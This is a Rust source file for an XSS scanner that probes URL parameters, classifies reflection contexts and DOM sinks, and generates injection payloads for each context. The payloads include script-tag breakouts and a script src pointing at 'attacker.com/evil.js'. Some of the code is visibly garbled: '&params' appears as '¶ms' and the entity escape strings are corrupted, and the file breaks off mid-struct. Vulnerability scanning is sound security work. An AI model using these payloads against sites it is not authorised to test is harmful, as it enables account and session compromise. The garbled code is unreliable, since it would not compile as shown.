use crate::http_client::HttpClient;
use crate::scanners::parameter_filter::{ParameterFilter, ScannerType};
use crate::types::{Confidence, ScanConfig, Severity, Vulnerability};
use anyhow::Result;
use regex::Regex;
use std::sync::Arc;
use tracing::{debug, info};
#[derive(Debug, Clone, PartialEq)]
pub enum ReflectionContext {
HtmlBody,
HtmlAttributeDoubleQuoted,
HtmlAttributeSingleQuoted,
HtmlAttributeUnquoted,
HtmlComment,
JsStringDouble,
JsStringSingle,
JsTemplateLiteral,
JsCode,
UrlParameter,
CssValue,
ScriptSrc,
EventHandler,
JavaScriptUrl,
StyleTag,
DataAttribute,
None,
}
impl ReflectionContext {
pub fn break_chars(&self) -> &'static str {
match self {
ReflectionContext::HtmlBody => "<>",
ReflectionContext::HtmlAttributeDoubleQuoted => "\"",
ReflectionContext::HtmlAttributeSingleQuoted => "'",
ReflectionContext::HtmlAttributeUnquoted => " >",
ReflectionContext::HtmlComment => "-->",
ReflectionContext::JsStringDouble => "\"\\",
ReflectionContext::JsStringSingle => "'\\",
ReflectionContext::JsTemplateLiteral => "`\\${}",
ReflectionContext::JsCode => ";",
ReflectionContext::UrlParameter => "&",
ReflectionContext::CssValue => ";}<",
ReflectionContext::ScriptSrc => "\"'>",
ReflectionContext::EventHandler => "\"'",
ReflectionContext::JavaScriptUrl => "\"':",
ReflectionContext::StyleTag => "</>",
ReflectionContext::DataAttribute => "\"'",
ReflectionContext::None => "",
}
}
pub fn severity(&self) -> Severity {
match self {
ReflectionContext::JsCode
| ReflectionContext::EventHandler
| ReflectionContext::JavaScriptUrl => Severity::Critical,
ReflectionContext::HtmlBody
| ReflectionContext::JsStringDouble
| ReflectionContext::JsStringSingle
| ReflectionContext::JsTemplateLiteral
| ReflectionContext::ScriptSrc => Severity::High,
ReflectionContext::HtmlAttributeDoubleQuoted
| ReflectionContext::HtmlAttributeSingleQuoted
| ReflectionContext::HtmlAttributeUnquoted
| ReflectionContext::DataAttribute => Severity::High,
ReflectionContext::CssValue | ReflectionContext::StyleTag => Severity::Medium,
ReflectionContext::HtmlComment | ReflectionContext::UrlParameter => Severity::Low,
ReflectionContext::None => Severity::Info,
}
}
pub fn name(&self) -> &'static str {
match self {
ReflectionContext::HtmlBody => "HTML Body",
ReflectionContext::HtmlAttributeDoubleQuoted => "HTML Attribute (double-quoted)",
ReflectionContext::HtmlAttributeSingleQuoted => "HTML Attribute (single-quoted)",
ReflectionContext::HtmlAttributeUnquoted => "HTML Attribute (unquoted)",
ReflectionContext::HtmlComment => "HTML Comment",
ReflectionContext::JsStringDouble => "JavaScript String (double-quoted)",
ReflectionContext::JsStringSingle => "JavaScript String (single-quoted)",
ReflectionContext::JsTemplateLiteral => "JavaScript Template Literal",
ReflectionContext::JsCode => "JavaScript Code",
ReflectionContext::UrlParameter => "URL Parameter",
ReflectionContext::CssValue => "CSS Value",
ReflectionContext::ScriptSrc => "Script src Attribute",
ReflectionContext::EventHandler => "Event Handler",
ReflectionContext::JavaScriptUrl => "JavaScript URL",
ReflectionContext::StyleTag => "Style Tag",
ReflectionContext::DataAttribute => "Data Attribute",
ReflectionContext::None => "None",
}
}
}
#[derive(Debug, Clone, Default)]
pub struct EscapingBehavior {
pub escapes_lt: bool,
pub escapes_gt: bool,
pub escapes_double_quote: bool,
pub escapes_single_quote: bool,
pub escapes_backslash: bool,
pub strips_dangerous: bool,
pub url_encodes: bool,
pub escaped_chars: Vec<char>,
pub unescaped_chars: Vec<char>,
}
impl EscapingBehavior {
pub fn prevents_xss_in(&self, context: &ReflectionContext) -> bool {
match context {
ReflectionContext::HtmlBody => {
(self.escapes_lt && self.escapes_gt) || self.strips_dangerous
}
ReflectionContext::HtmlAttributeDoubleQuoted => {
self.escapes_double_quote || self.strips_dangerous
}
ReflectionContext::HtmlAttributeSingleQuoted => {
self.escapes_single_quote || self.strips_dangerous
}
ReflectionContext::HtmlAttributeUnquoted => {
self.strips_dangerous
}
ReflectionContext::JsStringDouble => {
(self.escapes_double_quote && self.escapes_backslash) || self.strips_dangerous
}
ReflectionContext::JsStringSingle => {
(self.escapes_single_quote && self.escapes_backslash) || self.strips_dangerous
}
ReflectionContext::JsTemplateLiteral => {
self.escapes_backslash || self.strips_dangerous
}
ReflectionContext::EventHandler => {
self.escapes_double_quote && self.escapes_single_quote
}
_ => self.strips_dangerous,
}
}
}
#[derive(Debug, Clone)]
pub struct XssProof {
pub context: ReflectionContext,
pub escaping: EscapingBehavior,
pub exploitable: bool,
pub payload: String,
pub confidence: f32,
pub evidence: String,
pub explanation: String,
}
#[derive(Debug, Clone)]
pub struct DomSink {
pub sink_type: DomSinkType,
pub source: DomSource,
pub js_snippet: String,
pub has_sanitization: bool,
}
#[derive(Debug, Clone, PartialEq)]
pub enum DomSinkType {
InnerHtml,
OuterHtml,
DocumentWrite,
DocumentWriteln,
Eval,
SetTimeout,
SetInterval,
Function,
LocationAssign,
LocationReplace,
LocationHref,
InsertAdjacentHtml,
JQueryHtml,
JQueryAppend,
JQueryPrepend,
JQueryAfter,
JQueryBefore,
CreateContextualFragment,
}
#[derive(Debug, Clone, PartialEq)]
pub enum DomSource {
LocationHash,
LocationSearch,
LocationHref,
LocationPathname,
DocumentUrl,
DocumentReferrer,
WindowName,
DocumentCookie,
LocalStorage,
SessionStorage,
PostMessage,
UrlSearchParams,
}
impl DomSinkType {
pub fn severity(&self) -> Severity {
match self {
DomSinkType::Eval | DomSinkType::Function => Severity::Critical,
DomSinkType::SetTimeout | DomSinkType::SetInterval => Severity::Critical,
DomSinkType::InnerHtml
| DomSinkType::OuterHtml
| DomSinkType::DocumentWrite
| DomSinkType::DocumentWriteln => Severity::High,
DomSinkType::LocationAssign
| DomSinkType::LocationReplace
| DomSinkType::LocationHref => Severity::High,
_ => Severity::Medium,
}
}
pub fn name(&self) -> &'static str {
match self {
DomSinkType::InnerHtml => "innerHTML",
DomSinkType::OuterHtml => "outerHTML",
DomSinkType::DocumentWrite => "document.write",
DomSinkType::DocumentWriteln => "document.writeln",
DomSinkType::Eval => "eval",
DomSinkType::SetTimeout => "setTimeout",
DomSinkType::SetInterval => "setInterval",
DomSinkType::Function => "Function",
DomSinkType::LocationAssign => "location.assign",
DomSinkType::LocationReplace => "location.replace",
DomSinkType::LocationHref => "location.href",
DomSinkType::InsertAdjacentHtml => "insertAdjacentHTML",
DomSinkType::JQueryHtml => "$.html",
DomSinkType::JQueryAppend => "$.append",
DomSinkType::JQueryPrepend => "$.prepend",
DomSinkType::JQueryAfter => "$.after",
DomSinkType::JQueryBefore => "$.before",
DomSinkType::CreateContextualFragment => "createContextualFragment",
}
}
}
impl DomSource {
pub fn name(&self) -> &'static str {
match self {
DomSource::LocationHash => "location.hash",
DomSource::LocationSearch => "location.search",
DomSource::LocationHref => "location.href",
DomSource::LocationPathname => "location.pathname",
DomSource::DocumentUrl => "document.URL",
DomSource::DocumentReferrer => "document.referrer",
DomSource::WindowName => "window.name",
DomSource::DocumentCookie => "document.cookie",
DomSource::LocalStorage => "localStorage",
DomSource::SessionStorage => "sessionStorage",
DomSource::PostMessage => "postMessage",
DomSource::UrlSearchParams => "URLSearchParams",
}
}
}
pub struct ProofXssScanner {
http_client: Arc<HttpClient>,
canary_prefix: String,
}
impl ProofXssScanner {
pub fn new(http_client: Arc<HttpClient>) -> Self {
Self {
http_client,
canary_prefix: "LNKR".to_string(),
}
}
fn generate_canary(&self) -> String {
let random: u64 = rand::random();
format!("{}_{:x}", self.canary_prefix, random)
}
fn generate_probe(&self, canary: &str) -> String {
format!("{}\"'<>/\\`${{}}", canary)
}
pub async fn scan(
&self,
url: &str,
config: &ScanConfig,
) -> Result<(Vec<Vulnerability>, usize)> {
let mut vulnerabilities = Vec::new();
let mut tests_run = 0;
info!("[Proof-XSS] Starting proof-based XSS scan for: {}", url);
let params = self.extract_parameters(url);
if params.is_empty() {
debug!("[Proof-XSS] No parameters found in URL, checking for DOM XSS only");
if let Ok(response) = self.http_client.get(url).await {
tests_run += 1;
let dom_vulns = self.analyze_dom_xss(url, &response.body);
vulnerabilities.extend(dom_vulns);
}
return Ok((vulnerabilities, tests_run));
}
for (param_name, _original_value) in ¶ms {
if ParameterFilter::should_skip_parameter(param_name, ScannerType::XSS) {
debug!("[Proof-XSS] Skipping filtered parameter: {}", param_name);
continue;
}
let canary = self.generate_canary();
let probe = self.generate_probe(&canary);
let baseline_url = self.build_test_url(url, param_name, &canary);
let baseline_response = match self.http_client.get(&baseline_url).await {
Ok(r) => r,
Err(e) => {
debug!("[Proof-XSS] Baseline request failed for {}: {}", param_name, e);
continue;
}
};
tests_run += 1;
let contexts = self.find_reflection_contexts(&baseline_response.body, &canary);
if contexts.is_empty() {
debug!("[Proof-XSS] No reflection found for parameter: {}", param_name);
continue;
}
debug!(
"[Proof-XSS] Found {} reflection contexts for parameter: {}",
contexts.len(),
param_name
);
let probe_url = self.build_test_url(url, param_name, &probe);
let probe_response = match self.http_client.get(&probe_url).await {
Ok(r) => r,
Err(e) => {
debug!("[Proof-XSS] Probe request failed for {}: {}", param_name, e);
continue;
}
};
tests_run += 1;
let escaping = self.analyze_escaping(&baseline_response.body, &probe_response.body, &canary, &probe);
for context in &contexts {
if let Some(proof) = self.prove_exploitability(
context,
&escaping,
&baseline_response.body,
&probe_response.body,
&canary,
) {
if proof.exploitable {
info!(
"[Proof-XSS] PROVEN XSS in parameter '{}' context '{}'",
param_name,
context.name()
);
vulnerabilities.push(self.create_vulnerability(
url,
param_name,
&proof,
));
break;
}
}
}
let dom_vulns = self.analyze_dom_xss(url, &baseline_response.body);
for dom_vuln in dom_vulns {
if !vulnerabilities.iter().any(|v| v.payload == dom_vuln.payload) {
vulnerabilities.push(dom_vuln);
}
}
}
vulnerabilities.sort_by(|a, b| {
a.url.cmp(&b.url)
.then(a.parameter.cmp(&b.parameter))
.then(a.vuln_type.cmp(&b.vuln_type))
});
vulnerabilities.dedup_by(|a, b| {
a.url == b.url && a.parameter == b.parameter && a.vuln_type == b.vuln_type
});
info!(
"[Proof-XSS] Scan complete: {} vulnerabilities proven, {} tests",
vulnerabilities.len(),
tests_run
);
Ok((vulnerabilities, tests_run))
}
fn extract_parameters(&self, url: &str) -> Vec<(String, String)> {
let mut params = Vec::new();
if let Ok(parsed) = url::Url::parse(url) {
for (key, value) in parsed.query_pairs() {
params.push((key.to_string(), value.to_string()));
}
}
params
}
fn build_test_url(&self, base_url: &str, param_name: &str, payload: &str) -> String {
if let Ok(mut parsed) = url::Url::parse(base_url) {
let pairs: Vec<(String, String)> = parsed
.query_pairs()
.map(|(k, v)| {
if k == param_name {
(k.to_string(), payload.to_string())
} else {
(k.to_string(), v.to_string())
}
})
.collect();
parsed.set_query(None);
for (k, v) in pairs {
parsed.query_pairs_mut().append_pair(&k, &v);
}
parsed.to_string()
} else {
base_url.to_string()
}
}
fn find_reflection_contexts(&self, body: &str, canary: &str) -> Vec<ReflectionContext> {
let mut contexts = Vec::new();
let canary_lower = canary.to_lowercase();
let body_lower = body.to_lowercase();
let mut search_start = 0;
while let Some(pos) = body_lower[search_start..].find(&canary_lower) {
let absolute_pos = search_start + pos;
if let Some(context) = self.determine_context_at_position(body, absolute_pos, canary) {
if !contexts.contains(&context) {
contexts.push(context);
}
}
search_start = absolute_pos + 1;
}
contexts
}
fn determine_context_at_position(
&self,
body: &str,
pos: usize,
canary: &str,
) -> Option<ReflectionContext> {
let before = &body[..pos];
let _after = &body[pos + canary.len()..];
if self.is_inside_script_tag(before) {
return self.determine_js_context(before);
}
if self.is_inside_style_tag(before) {
return Some(ReflectionContext::StyleTag);
}
if self.is_inside_comment(before) {
return Some(ReflectionContext::HtmlComment);
}
if let Some(attr_context) = self.determine_attribute_context(before) {
return Some(attr_context);
}
Some(ReflectionContext::HtmlBody)
}
fn is_inside_script_tag(&self, before: &str) -> bool {
let before_lower = before.to_lowercase();
let last_script_open = before_lower.rfind("<script");
let last_script_close = before_lower.rfind("</script");
let inside = match (last_script_open, last_script_close) {
(Some(open), Some(close)) => open > close,
(Some(_), None) => true,
_ => false,
};
if !inside {
return false;
}
let script_tag_start = last_script_open.unwrap();
let tag_content = &before_lower[script_tag_start..];
if let Some(tag_end) = tag_content.find('>') {
let tag = &tag_content[..tag_end + 1];
if tag.contains("type=") {
let non_executable = [
"application/json",
"application/ld+json",
"importmap",
"application/xml",
"text/template",
"text/html",
"text/x-template",
"text/x-handlebars-template",
];
for netype in &non_executable {
if tag.contains(netype) {
return false;
}
}
}
}
true
}
fn is_inside_style_tag(&self, before: &str) -> bool {
let last_style_open = before.to_lowercase().rfind("<style");
let last_style_close = before.to_lowercase().rfind("</style");
match (last_style_open, last_style_close) {
(Some(open), Some(close)) => open > close,
(Some(_), None) => true,
_ => false,
}
}
fn is_inside_comment(&self, before: &str) -> bool {
let last_comment_open = before.rfind("<!--");
let last_comment_close = before.rfind("-->");
match (last_comment_open, last_comment_close) {
(Some(open), Some(close)) => open > close,
(Some(_), None) => true,
_ => false,
}
}
fn determine_js_context(&self, before: &str) -> Option<ReflectionContext> {
let script_start = before.to_lowercase().rfind("<script")?;
let js_content = &before[script_start..];
let tag_end = js_content.find('>')?;
let js_code = &js_content[tag_end + 1..];
let mut in_double_string = false;
let mut in_single_string = false;
let mut in_template_literal = false;
let mut prev_char = ' ';
for ch in js_code.chars() {
if prev_char != '\\' {
match ch {
'"' if !in_single_string && !in_template_literal => {
in_double_string = !in_double_string;
}
'\'' if !in_double_string && !in_template_literal => {
in_single_string = !in_single_string;
}
'`' if !in_double_string && !in_single_string => {
in_template_literal = !in_template_literal;
}
_ => {}
}
}
prev_char = ch;
}
if in_double_string {
Some(ReflectionContext::JsStringDouble)
} else if in_single_string {
Some(ReflectionContext::JsStringSingle)
} else if in_template_literal {
Some(ReflectionContext::JsTemplateLiteral)
} else {
Some(ReflectionContext::JsCode)
}
}
fn determine_attribute_context(&self, before: &str) -> Option<ReflectionContext> {
let last_tag_open = before.rfind('<')?;
let last_tag_close = before.rfind('>');
if let Some(close) = last_tag_close {
if close > last_tag_open {
return None;
}
}
let tag_content = &before[last_tag_open..];
let event_handler_re = Regex::new(r#"on\w+\s*=\s*["']?[^"']*$"#).ok()?;
if event_handler_re.is_match(&tag_content.to_lowercase()) {
return Some(ReflectionContext::EventHandler);
}
if tag_content.to_lowercase().contains("href")
&& tag_content.to_lowercase().contains("javascript:")
{
return Some(ReflectionContext::JavaScriptUrl);
}
if tag_content.to_lowercase().contains("<script")
&& tag_content.to_lowercase().contains("src")
{
return Some(ReflectionContext::ScriptSrc);
}
if tag_content.to_lowercase().contains("data-") {
if tag_content.ends_with('"') || tag_content.contains("=\"") {
return Some(ReflectionContext::DataAttribute);
}
}
let in_double_quote = tag_content.matches('"').count() % 2 == 1;
let in_single_quote = tag_content.matches('\'').count() % 2 == 1;
if in_double_quote {
Some(ReflectionContext::HtmlAttributeDoubleQuoted)
} else if in_single_quote {
Some(ReflectionContext::HtmlAttributeSingleQuoted)
} else if tag_content.contains('=') {
Some(ReflectionContext::HtmlAttributeUnquoted)
} else {
None
}
}
fn analyze_escaping(
&self,
baseline_body: &str,
probe_body: &str,
canary: &str,
probe: &str,
) -> EscapingBehavior {
let mut behavior = EscapingBehavior::default();
let test_chars = [
('"', """, "\\\"", """),
('\'', "'", "\\'", "'"),
('<', "<", "", "<"),
('>', ">", "", ">"),
('\\', "", "\\\\", ""),
('`', "", "\\`", ""),
];
let probe_lower = probe.to_lowercase();
let probe_body_lower = probe_body.to_lowercase();
for (char, html_escape, js_escape, numeric_escape) in test_chars {
let char_str = char.to_string();
let probe_with_char = format!("{}{}", canary.to_lowercase(), char_str);
let is_escaped = (!html_escape.is_empty()
&& probe_body_lower.contains(&format!(
"{}{}",
canary.to_lowercase(),
html_escape.to_lowercase()
)))
|| (!js_escape.is_empty()
&& probe_body_lower.contains(&format!(
"{}{}",
canary.to_lowercase(),
js_escape.to_lowercase()
)))
|| (!numeric_escape.is_empty()
&& probe_body_lower.contains(&format!(
"{}{}",
canary.to_lowercase(),
numeric_escape.to_lowercase()
)));
let is_unescaped = probe_body_lower.contains(&probe_with_char);
let _is_stripped = !is_escaped && !is_unescaped;
match char {
'"' => behavior.escapes_double_quote = is_escaped && !is_unescaped,
'\'' => behavior.escapes_single_quote = is_escaped && !is_unescaped,
'<' => behavior.escapes_lt = is_escaped && !is_unescaped,
'>' => behavior.escapes_gt = is_escaped && !is_unescaped,
'\\' => behavior.escapes_backslash = is_escaped && !is_unescaped,
_ => {}
}
if is_unescaped {
behavior.unescaped_chars.push(char);
} else if is_escaped {
behavior.escaped_chars.push(char);
}
}
let dangerous_patterns = ["<script", "javascript:", "onerror", "onclick"];
behavior.strips_dangerous = dangerous_patterns
.iter()
.all(|p| !probe_body_lower.contains(p) || baseline_body.to_lowercase().contains(p));
behavior.url_encodes = probe_body.contains("%22")
|| probe_body.contains("%27")
|| probe_body.contains("%3C")
|| probe_body.contains("%3E");
behavior
}
fn prove_exploitability(
&self,
context: &ReflectionContext,
escaping: &EscapingBehavior,
baseline_body: &str,
probe_body: &str,
canary: &str,
) -> Option<XssProof> {
let exploitable = !escaping.prevents_xss_in(context);
if !exploitable {
return None;
}
let (payload, explanation) = self.generate_payload_for_context(context, escaping);
let evidence = self.extract_evidence(probe_body, canary, context);
let confidence = self.calculate_confidence(context, escaping, baseline_body, probe_body);
Some(XssProof {
context: context.clone(),
escaping: escaping.clone(),
exploitable,
payload,
confidence,
evidence,
explanation,
})
}
fn generate_payload_for_context(
&self,
context: &ReflectionContext,
escaping: &EscapingBehavior,
) -> (String, String) {
match context {
ReflectionContext::HtmlBody => {
if !escaping.escapes_lt {
(
"<img src=x onerror=alert(1)>".to_string(),
"HTML body reflects < and > unescaped, allowing tag injection".to_string(),
)
} else {
(
"<svg/onload=alert(1)>".to_string(),
"HTML body may allow SVG injection".to_string(),
)
}
}
ReflectionContext::HtmlAttributeDoubleQuoted => {
if !escaping.escapes_double_quote {
(
"\" onmouseover=\"alert(1)\" x=\"".to_string(),
"Double-quoted attribute does not escape \", allowing attribute breakout"
.to_string(),
)
} else {
(
"\" autofocus onfocus=\"alert(1)".to_string(),
"Attempting attribute injection".to_string(),
)
}
}
ReflectionContext::HtmlAttributeSingleQuoted => {
if !escaping.escapes_single_quote {
(
"' onmouseover='alert(1)' x='".to_string(),
"Single-quoted attribute does not escape ', allowing attribute breakout"
.to_string(),
)
} else {
(
"' autofocus onfocus='alert(1)".to_string(),
"Attempting attribute injection".to_string(),
)
}
}
ReflectionContext::HtmlAttributeUnquoted => (
" onmouseover=alert(1) ".to_string(),
"Unquoted attribute allows space-based breakout".to_string(),
),
ReflectionContext::JsStringDouble => {
if !escaping.escapes_double_quote && !escaping.escapes_backslash {
(
"\";alert(1);//".to_string(),
"JavaScript double-quoted string does not escape \" or \\, allowing code injection".to_string(),
)
} else if !escaping.escapes_backslash {
(
"\\x3cimg src=x onerror=alert(1)\\x3e".to_string(),
"JavaScript string allows hex escape injection".to_string(),
)
} else {
(
"</script><script>alert(1)</script>".to_string(),
"Attempting script tag breakout".to_string(),
)
}
}
ReflectionContext::JsStringSingle => {
if !escaping.escapes_single_quote && !escaping.escapes_backslash {
(
"';alert(1);//".to_string(),
"JavaScript single-quoted string does not escape ' or \\, allowing code injection".to_string(),
)
} else {
(
"</script><script>alert(1)</script>".to_string(),
"Attempting script tag breakout".to_string(),
)
}
}
ReflectionContext::JsTemplateLiteral => (
"${alert(1)}".to_string(),
"JavaScript template literal allows expression injection".to_string(),
),
ReflectionContext::JsCode => (
";alert(1);//".to_string(),
"Direct injection into JavaScript code context".to_string(),
),
ReflectionContext::EventHandler => (
"alert(1)".to_string(),
"Direct injection into event handler".to_string(),
),
ReflectionContext::JavaScriptUrl => (
"alert(1)".to_string(),
"Direct injection into javascript: URL".to_string(),
),
ReflectionContext::ScriptSrc => (
"//attacker.com/evil.js".to_string(),
"Script src attribute injection".to_string(),
),
ReflectionContext::CssValue => (
"expression(alert(1))".to_string(),
"CSS expression injection (legacy browsers)".to_string(),
),
ReflectionContext::StyleTag => (
"</style><script>alert(1)</script>".to_string(),
"Style tag breakout".to_string(),
),
ReflectionContext::HtmlComment => (
"--><script>alert(1)</script><!--".to_string(),
"HTML comment breakout".to_string(),
),
ReflectionContext::DataAttribute => (
"\" onclick=\"alert(1)".to_string(),
"Data attribute breakout".to_string(),
),
ReflectionContext::UrlParameter => (
"javascript:alert(1)".to_string(),
"URL parameter injection".to_string(),
),
ReflectionContext::None => ("".to_string(), "No reflection context".to_string()),
}
}
fn calculate_confidence(
&self,
context: &ReflectionContext,
escaping: &EscapingBehavior,
_baseline_body: &str,
probe_body: &str,
) -> f32 {
let mut confidence = 0.5;
match context {
ReflectionContext::JsCode | ReflectionContext::EventHandler => {
confidence += 0.3;
}
ReflectionContext::HtmlBody | ReflectionContext::JsStringDouble | ReflectionContext::JsStringSingle => {
confidence += 0.2;
}
_ => {}
}
if !escaping.unescaped_chars.is_empty() {
confidence += 0.1 * escaping.unescaped_chars.len() as f32;
}
if !escaping.escaped_chars.is_empty() {
confidence -= 0.05 * escaping.escaped_chars.len() as f32;
}
let dangerous_chars = ['<', '>', '"', '\''];
let dangerous_in_output = dangerous_chars
.iter()
.filter(|c| probe_body.contains(**c))
.count();
confidence += 0.05 * dangerous_in_output as f32;
confidence.clamp(0.1, 0.99)
}
fn extract_evidence(&self, body: &str, canary: &str, context: &ReflectionContext) -> String {
let canary_lower = canary.to_lowercase();
let body_lower = body.to_lowercase();
if let Some(pos) = body_lower.find(&canary_lower) {
let start = pos.saturating_sub(30);
let end = (pos + canary.len() + 50).min(body.len());
let snippet = &body[start..end];
format!(
"Context: {} | Evidence: ...{}...",
context.name(),
snippet.replace('\n', " ").replace('\r', "")
)
} else {
format!("Reflection detected in {} context", context.name())
}
}
fn analyze_dom_xss(&self, url: &str, body: &str) -> Vec<Vulnerability> {
let mut vulnerabilities = Vec::new();
let script_re = Regex::new(r"<script[^>]*>([\s\S]*?)</script>").unwrap();
for cap in script_re.captures_iter(body) {
if let Some(js_content) = cap.get(1) {
let js = js_content.as_str();
let sinks = self.find_dom_sinks(js);
for sink in sinks {
if !sink.has_sanitization {
vulnerabilities.push(self.create_dom_xss_vulnerability(url, &sink));
}
}
}
}
vulnerabilities
}
fn find_dom_sinks(&self, js: &str) -> Vec<DomSink> {
let mut sinks = Vec::new();
let sink_patterns = [
(
r"\.innerHTML\s*=\s*[^;]*(?:location\.hash|location\.search|location\.href|document\.URL|document\.referrer|window\.name)",
DomSinkType::InnerHtml,
),
(
r"document\.write(?:ln)?\s*\([^)]*(?:location\.hash|location\.search|location\.href|document\.URL)",
DomSinkType::DocumentWrite,
),
(
r"eval\s*\([^)]*(?:location\.hash|location\.search|location\.href|document\.URL)",
DomSinkType::Eval,
),
(
r"setTimeout\s*\([^)]*(?:location\.hash|location\.search|location\.href)",
DomSinkType::SetTimeout,
),
(
r"setInterval\s*\([^)]*(?:location\.hash|location\.search|location\.href)",
DomSinkType::SetInterval,
),
(
r"\$\([^)]*\)\.html\s*\([^)]*(?:location\.hash|location\.search|location\.href)",
DomSinkType::JQueryHtml,
),
(
r"location\.href\s*=\s*[^;]*(?:location\.hash|location\.search|document\.referrer)",
DomSinkType::LocationHref,
),
];
for (pattern, sink_type) in sink_patterns {
if let Ok(re) = Regex::new(pattern) {
for mat in re.find_iter(js) {
let snippet = mat.as_str().to_string();
let source = self.detect_source_in_snippet(&snippet);
sinks.push(DomSink {
sink_type: sink_type.clone(),
source,
js_snippet: self.truncate_snippet(&snippet, 100),
has_sanitization: self.has_sanitization(&snippet),
});
}
}
}
let simple_patterns = [
(r"\.innerHTML\s*=", DomSinkType::InnerHtml),
(r"document\.write\s*\(", DomSinkType::DocumentWrite),
(r"eval\s*\(", DomSinkType::Eval),
];
for (pattern, sink_type) in simple_patterns {
if let Ok(re) = Regex::new(pattern) {
for mat in re.find_iter(js) {
let start = mat.start().saturating_sub(50);
let end = (mat.end() + 100).min(js.len());
let context = &js[start..end];
if self.has_tainted_source_nearby(context) {
let source = self.detect_source_in_snippet(context);
if !sinks.iter().any(|s| s.js_snippet == self.truncate_snippet(context, 100)) {
sinks.push(DomSink {
sink_type: sink_type.clone(),
source,
js_snippet: self.truncate_snippet(context, 100),
has_sanitization: self.has_sanitization(context),
});
}
}
}
}
}
let tainted_vars = self.find_tainted_variables(js);
for (var_name, source) in &tainted_vars {
let var_sink_patterns = [
(format!(r"\.innerHTML\s*\+?=\s*[^;]*\b{}\b", regex::escape(var_name)), DomSinkType::InnerHtml),
(format!(r"\.outerHTML\s*\+?=\s*[^;]*\b{}\b", regex::escape(var_name)), DomSinkType::InnerHtml),
(format!(r"document\.write(?:ln)?\s*\([^)]*\b{}\b", regex::escape(var_name)), DomSinkType::DocumentWrite),
(format!(r"eval\s*\([^)]*\b{}\b", regex::escape(var_name)), DomSinkType::Eval),
(format!(r"setTimeout\s*\([^)]*\b{}\b", regex::escape(var_name)), DomSinkType::SetTimeout),
(format!(r"\$\([^)]*\)\.html\s*\([^)]*\b{}\b", regex::escape(var_name)), DomSinkType::JQueryHtml),
];
for (pattern, sink_type) in var_sink_patterns {
if let Ok(re) = Regex::new(&pattern) {
for mat in re.find_iter(js) {
let start = mat.start().saturating_sub(20);
let end = (mat.end() + 20).min(js.len());
let context = &js[start..end];
if !sinks.iter().any(|s| s.js_snippet.contains(&mat.as_str()[..mat.as_str().len().min(30)])) {
sinks.push(DomSink {
sink_type: sink_type.clone(),
source: source.clone(),
js_snippet: format!("Tainted var '{}' → {}", var_name, self.truncate_snippet(context, 80)),
has_sanitization: self.has_sanitization(context),
});
}
}
}
}
}
sinks
}
fn find_tainted_variables(&self, js: &str) -> Vec<(String, DomSource)> {
let mut tainted = Vec::new();
let var_patterns = [
(r"(?:const|let|var)\s+([a-zA-Z_$][a-zA-Z0-9_$]*)\s*=\s*[^;]*location\.hash", DomSource::LocationHash),
(r"(?:const|let|var)\s+([a-zA-Z_$][a-zA-Z0-9_$]*)\s*=\s*[^;]*location\.search", DomSource::LocationSearch),
(r"(?:const|let|var)\s+([a-zA-Z_$][a-zA-Z0-9_$]*)\s*=\s*[^;]*location\.href", DomSource::LocationHref),
(r"(?:const|let|var)\s+([a-zA-Z_$][a-zA-Z0-9_$]*)\s*=\s*[^;]*document\.URL", DomSource::DocumentUrl),
(r"(?:const|let|var)\s+([a-zA-Z_$][a-zA-Z0-9_$]*)\s*=\s*[^;]*document\.referrer", DomSource::DocumentReferrer),
(r"(?:const|let|var)\s+([a-zA-Z_$][a-zA-Z0-9_$]*)\s*=\s*[^;]*window\.name", DomSource::WindowName),
(r"(?:const|let|var)\s+([a-zA-Z_$][a-zA-Z0-9_$]*)\s*=\s*[^;]*URLSearchParams", DomSource::UrlSearchParams),
(r"(?:const|let|var)\s+([a-zA-Z_$][a-zA-Z0-9_$]*)\s*=\s*decodeURIComponent\s*\([^)]*location\.hash", DomSource::LocationHash),
(r"(?:const|let|var)\s+([a-zA-Z_$][a-zA-Z0-9_$]*)\s*=\s*decodeURIComponent\s*\([^)]*location\.search", DomSource::LocationSearch),
];
for (pattern, source) in var_patterns {
if let Ok(re) = Regex::new(pattern) {
for cap in re.captures_iter(js) {
if let Some(var_match) = cap.get(1) {
let var_name = var_match.as_str().to_string();
if !["undefined", "null", "true", "false", "this"].contains(&var_name.as_str()) {
tainted.push((var_name, source.clone()));
}
}
}
}
}
tainted
}
fn detect_source_in_snippet(&self, snippet: &str) -> DomSource {
let lower = snippet.to_lowercase();
if lower.contains("location.hash") {
DomSource::LocationHash
} else if lower.contains("location.search") {
DomSource::LocationSearch
} else if lower.contains("location.href") {
DomSource::LocationHref
} else if lower.contains("location.pathname") {
DomSource::LocationPathname
} else if lower.contains("document.url") {
DomSource::DocumentUrl
} else if lower.contains("document.referrer") {
DomSource::DocumentReferrer
} else if lower.contains("window.name") {
DomSource::WindowName
} else if lower.contains("document.cookie") {
DomSource::DocumentCookie
} else if lower.contains("localstorage") {
DomSource::LocalStorage
} else if lower.contains("sessionstorage") {
DomSource::SessionStorage
} else if lower.contains("postmessage") || lower.contains("onmessage") {
DomSource::PostMessage
} else if lower.contains("urlsearchparams") {
DomSource::UrlSearchParams
} else {
DomSource::LocationHash }
}
fn has_tainted_source_nearby(&self, context: &str) -> bool {
let sources = [
"location.hash",
"location.search",
"location.href",
"location.pathname",
"document.URL",
"document.referrer",
"window.name",
"document.cookie",
"localStorage",
"sessionStorage",
"URLSearchParams",
];
let lower = context.to_lowercase();
sources.iter().any(|s| lower.contains(&s.to_lowercase()))
}
fn has_sanitization(&self, snippet: &str) -> bool {
let sanitizers = [
"DOMPurify",
"sanitize",
"escape",
"encode",
"htmlEntities",
"textContent",
"innerText",
"createTextNode",
"encodeURIComponent",
"encodeURI",
];
let lower = snippet.to_lowercase();
sanitizers.iter().any(|s| lower.contains(&s.to_lowercase()))
}
fn truncate_snippet(&self, snippet: &str, max_len: usize) -> String {
if snippet.len() <= max_len {
snippet.to_string()
} else {
format!("{}...", &snippet[..max_len])
}
}
fn create_vulnerability(&self, url: &str, param_name: &str, proof: &XssProof) -> Vulnerability {
Vulnerability {
id: uuid::Uuid::new_v4().to_string(),
vuln_type: format!("Reflected XSS ({}) in '{}'", proof.context.name(), param_name),
category: "XSS".to_string(),
description: format!(
"PROVEN XSS vulnerability in parameter '{}'. {}\n\n\
Context: {}\n\
Unescaped characters: {:?}\n\
Escaped characters: {:?}",
param_name,
proof.explanation,
proof.context.name(),
proof.escaping.unescaped_chars,
proof.escaping.escaped_chars,
),
severity: proof.context.severity(),
confidence: if proof.confidence > 0.8 {
Confidence::High
} else if proof.confidence > 0.5 {
Confidence::Medium
} else {
Confidence::Low
},
